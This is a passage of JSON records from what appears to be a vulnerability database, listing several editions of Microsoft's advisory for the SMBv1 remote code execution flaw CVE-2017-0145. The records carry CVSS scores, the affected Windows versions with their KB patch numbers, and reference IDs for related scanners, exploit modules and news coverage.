"kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": 
"KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T06:44:56", "differentElements": ["msAffectedSoftware"], "edition": 84}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, 
"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-01T09:06:55", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": 
"exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012216", "KB4013198", "KB4012213", "KB4012217", "KB3177186", "KB4013429", "KB3210720", "KB3213986", "KB4012215", "KB3212646", "KB4012214", "KB3205409", "KB3205401", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012598", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core 
installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T09:06:55", "differentElements": ["msAffectedSoftware"], "edition": 85}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": 
{"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-01T12:45:41", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-01T12:45:41", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-01T12:45:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3205401", "KB4012214", "KB3177186", "KB3212646", "KBMS16-110, 3187754", "KB3210721", "KB4014077", "KB4012217", "KB4012212", "KB3210720", "KB3213986", "KB4012598", "KB4012215", "KB4013198", "KB3205409", "KB4012216", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 
2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, 
{"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": 
"Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T12:45:41", "differentElements": ["msAffectedSoftware", "vendorCvss"], "edition": 86}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "91abc99a545f1702db030dbb906d98de", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
